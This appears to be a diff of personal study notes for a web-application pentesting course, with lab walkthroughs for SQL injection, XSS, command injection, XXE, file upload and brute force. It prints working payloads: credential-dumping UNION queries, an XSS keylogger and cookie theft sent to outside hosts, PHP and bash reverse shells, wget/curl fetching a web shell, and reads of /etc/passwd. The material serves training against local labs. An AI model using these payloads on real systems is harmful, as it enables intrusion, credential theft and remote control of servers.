PEH - Web app course

Author: syselement

peh/6-webapp/.gitbook/assets/2025-02-25_22-01-04_910.png

@@ -40,51 +40,23 @@ cd $HOME/peh/labs
 
 > # Lab solutions
 >
-> ## Injection0x03
+> ## Command Inj 0x02
 >
-> - sushi shop
->- product search
-> - UNION select to enum other tables
->- find creds & login
+> `https://tcm-sec.com/& whoami& asd`
+>`https://tcm-sec.com/ | sleep 10 | asd`
 > 
-> ### solutions:
+>`https://webhook.site/<id>/?`whoami``
 > 
-> `Tanjyoubi Sushi Rack' UNION SELECT username,password,null,null from injection0x03_users-- -`
-> 
->## XSS 0x01
-> 
->`<img src=x onerror=alert(1);>`
-> 
-> ## XSS 0x02
-> 
-> `<img src=x onerror=alert(1);>`
->
-> `<script>function logKey(event){fetch("http://10.10.100.146:4444/e?c=" + event.key)} document.addEventListener('keydown', logKey);</script>`
->
-> ## XSS 0x03
->
-> ## Command Inj 0x01
->
-> `https://tcm-sec.com; whoami; asd`
->`; cat /etc/passwd; asd`
-> 
->## Command Inj 0x02
-> 
->`https://tcm-sec.com/& whoami& asd`
-> `https://tcm-sec.com/ | sleep 10 | asd`
->
-> `https://webhook.site/<id>/?`whoami``
->
 > ## Command Inj 0x03
->
+> 
 > `45123)^2))}';whoami;#`
 > 
 >## File upload 0x01
 > 
 >- Intercept
 > - Change contents
 > - Or turn off JS
->
+> 
 > ## File upload 0x02
 >
 > - Bypass the client-side again
@@ -94,74 +66,74 @@ cd $HOME/peh/labs
 > 
 >- Bypass the client-side again
 > - Intercept and change the content-type again
-> - Use an extension that's not in the blocklist (.phtml)
+>- Use an extension that's not in the blocklist (.phtml)
 > 
 >## Authentication 0x01
 > 
 >- Brute force
 > 
-> ## Authentication 0x02
->
-> - MFA code, switch username (code is OK for all users)
->- Or, just brute the code
+>## Authentication 0x02
 > 
+>- MFA code, switch username (code is OK for all users)
+> - Or, just brute the code
+>
 > ## Authentication 0x03
 > 
 >- Account lockout after 5 attempts, therefore brute the top 4 passwords against a username list
 > 
 >- common password list:
 > 
->```
-> password
->password123
-> letmein
+> ```
+>password
+> password123
+>letmein
 > manchesterunited
 >```
 > 
 >- common usernames list: `/usr/share/seclists/Usernames/Names/names.txt`
 > 
 >## XXE, IDOR, capstone
 > 
->### XXE 0x01
+> ### XXE 0x01
 > 
-> ```
+>```
 > <?xml version="1.0" encoding="UTF-8"?>
-> <!DOCTYPE creds [
+><!DOCTYPE creds [
 > <!ELEMENT creds ANY >]>
 > <creds><user>username</user><password>pass</password></creds>
 >```
 > 
 >```
 > <?xml version="1.0" encoding="UTF-8"?>
-><!DOCTYPE creds [
+> <!DOCTYPE creds [
 > <!ELEMENT creds ANY >
 ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
 > <creds><user>&xxe;</user><password>pass</password></creds>
-> ```
+>```
 > 
-> ### IDOR
+>### IDOR
 > 
-> `fuzz the parameter`
->
-> - find an admin user (or all of the admin users)
+>`fuzz the parameter`
 > 
+> - find an admin user (or all of the admin users)
+>
 > ### Capstone
-> 
+>
 > SQLi to get into admin panel
-> File upload to get RCE
+>File upload to get RCE
 > 
 >- XSS in the message alert
 > - XSS in account names probably? need to test
->
+> 
 > - brute force user accounts
->
+> 
 > - SQLi on adding rating
->
-> `http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
->
-> `http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
+> 
+>`http://localhost/capstone/coffee.php?coffee=3' or 1=1-- -`
+> 
+>`http://localhost/capstone/coffee.php?coffee=1%27%20union%20select%20null,username,password,null,null,null,null%20from%20users--%20-`
 > 
 ># To do list
 > 
-> - file upload capstone
->- auth0x03 testing
+>- file upload capstone
+> - auth0x03 testing

peh/6-webapp/.gitbook/assets/2025-02-25_23-17-21_912.png

@@ -2,6 +2,8 @@
 
 > - [SQL injection cheat sheet | Web Security Academy](https://portswigger.net/web-security/sql-injection/cheat-sheet)
 
+➡️ A **SQL injection** attack consist of an injection of a (malicious) SQL query via the user input from the client to the application, allowing attackers to read, modify, or delete database data, execute administrative operations, access files, or issue OS commands.
+
 ---
 
 ## Injection0x01 - UNION

peh/6-webapp/.gitbook/assets/2025-02-26_00-02-01_913.png

@@ -1,2 +1,94 @@
 # Web App - XSS
 
+> - [Cross-Site Scripting (XSS) Cheat Sheet - 2024 Edition | Web Security Academy](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
+
+➡️ **Cross-site scripting** (**XSS**) allows an attacker to compromise the interactions of the users with a vulnerable application. It lets the attacker execute (malicious) **JavaScript** in a victim's browser, compromising the user's interaction with the application.
+
+- **Reflected XSS**
+  - when an application unsafely includes user-supplied data (injected script) from an HTTP request in its immediate response
+  - payload (malicious script) come from the current HTTP request
+- **Stored XSS**
+  - when an application receives and stores data from an untrusted source and unsafely includes it within its later HTTP responses
+  - payload (malicious script) come from the application's database
+- **DOM-based XSS**
+  - when client-side Javascript (code) unsafely processes data from an untrusted source and writes it back to the DOM
+  - everything happens locally in the browser
+
+```bash
+alert(1)
+print()
+prompt("Hello")
+
+# log pressed key
+function logKey(event){console.log(event.key)}
+document.addEventListener('keydown', logKey)
+```
+
+---
+
+## XSS - DOM
+
+- The request happens entirelly locally
+  - no request seen in the browser **Dev Tools / Network** tab
+- Try some basic payloads
+
+```bash
+<script>prompt(1)</script>
+# did not work, it is not called/triggered
+
+<img src=x onerror ="prompt(1)">
+# works - injects an event-driven JavaScript payload that executes prompt(1) when the image fails to load due to an invalid source
+
+<img src=x onerror ="window.location.href='https://tcm-sec.com'">
+# redirect the user to another webpage
+```
+
+- The lab can be used for testing other payloads
+
+---
+
+## Stored XSS
+
+- To check if XSS is stored for more users, use
+  - incognito sessions
+  - or [Firefox Containers](https://addons.mozilla.org/en-US/firefox/addon/multi-account-containers/)
+  - to create 2 different environments with separate/difference accounts
+- First try some HTML injection, once found out if it works, XSS follows
+  - every user that visits the page is impacted by the **stored XSS payload**
+
+```bash
+<h1>Test</h1>
+# works - check on the second environment the Stored XSS
+
+<script>prompt(1)</script>
+# works - refresh second environment and you'll see the prompt
+
+<script>alert(document.cookie)</script>
+# Cookie can be stolen
+```
+
+![](.gitbook/assets/2025-02-25_22-01-04_910.png)
+
+---
+
+## XSS - Challenge
+
+- Open `http://localhost/labs/x0x03.php` first Firefox container
+- Open `http://localhost/labs/x0x03_admin.php` in the second container
+- Goal - exfiltrate the admin cookie
+- Use `netcat` or [https://webhook.site](https://webhook.site) (not for private traffic)
+  - use **Collaborator** (with BurpSuite Pro)
+
+```bash
+<script>var i = new Image; i.src="https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76/?"+document.cookie</script>
+```
+
+```bash
+admin_cookie
+5ac5355b84894ede056ab81b324c4675
+```
+
+![](.gitbook/assets/2025-02-25_23-17-21_912.png)
+
+---
+

peh/6-webapp/.gitbook/assets/2025-02-26_00-17-05_914.png

@@ -1,2 +1,120 @@
 # Web App - Command Injection
 
+> - [PayloadsAllTheThings - Command Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection)
+> - [Command injection | AppSecExplained](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/command-injection)
+
+➡️ **OS Command Injection**, or shell injection, occurs when a vulnerable application passes unvalidated user input to the system shell, allowing attackers to execute arbitrary OS commands on the server hosting the web app.
+
+---
+
+## Command Injection - Basics
+
+```bash
+| whoami #
+& whoami& asd
+; whoami; asd
+# Result: www-data
+
+; cat /etc/passwd; asd
+& ls -lah& asd
+# Check result in Source Code for better reading
+```
+
+![](.gitbook/assets/2025-02-26_00-02-01_913.png)
+
+- Pop a shell - check [Reverse Shell Cheat Sheet - Internal All The Things](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/)
+
+```bash
+; which bash; asd
+# Result: /bin/bash
+
+; /bin/bash -i >& /dev/tcp/192.168.31.131/4444 0>&1; asd
+# does NOT work
+
+; which python; asd
+; which python3; asd
+
+; which php; asd
+# Result: /usr/local/bin/php 
+
+; php -r '$sock=fsockopen("192.168.31.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");'; asd
+```
+
+![](.gitbook/assets/2025-02-26_00-17-05_914.png)
+
+---
+
+## Command Injection - Blind/Out-of-band
+
+```bash
+https://tcm-sec.com # Website OK
+https://tcm-sec.com/idontexist # Website not found
+
+https://tcm-sec.com/; whoami; asd # Website OK
+```
+
+- Open [https://webhook.site/](https://webhook.site/)
+  - **Out of band command injection** - captured from a different place
+
+```bash
+https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76?`whoami`
+
+# Result
+# https://webhook.site/4a14cea0-1e8c-4707-a596-cf1939bd4a76?www-data
+```
+
+```bash
+# Test a wget
+python3 -m http.server 8888
+
+# Command injection string
+https://tcm-sec.com \n wget 192.168.31.131:8888/test
+# the request worked
+```
+
+- Upload a shell and trigger it
+
+```bash
+cd $HOME/tcm/peh/webapp
+cp /usr/share/webshells/laudanum/php/php-reverse-shell.php rev.php
+
+# Update $ip and $port
+nano rev.php
+# 192.168.31.131, port 4444
+python3 -m http.server 8888
+
+# Command injection
+https://tcm-sec.com \n wget 192.168.31.131:8888/rev.php
+https://tcm-sec.com && curl http://192.168.31.131:8888/rev.php > $HOME/peh/labs/rev.php
+# Those injections may not work, but this is the idea
+
+# Start a listener and navigate to http://localhost/rev.php
+# Got reverse shell
+```
+
+---
+
+## Command Injection - Challenge
+
+- The app executes this
+
+```bash
+# Executed with Registration = TEST, Position X = 123 and PositionY = 456
+awk 'BEGIN {print sqrt(((-123)^2) + ((-456)^2))}'
+
+# Try injection on position Y
+456)^2))}';whoami;
+456)^2))}';whoami;#
+# Result: 472.298 www-data - Worked
+
+# Pop a shell via a php payload
+
+456)^2))}';php -r '$sock=fsockopen("192.168.31.131",4444);exec("/bin/sh -i <&3 >&3 2>&3");';#
+
+# Reverse shell received
+```
+
+![Command injection](.gitbook/assets/2025-02-27_23-53-57_915.png)
+
+---
+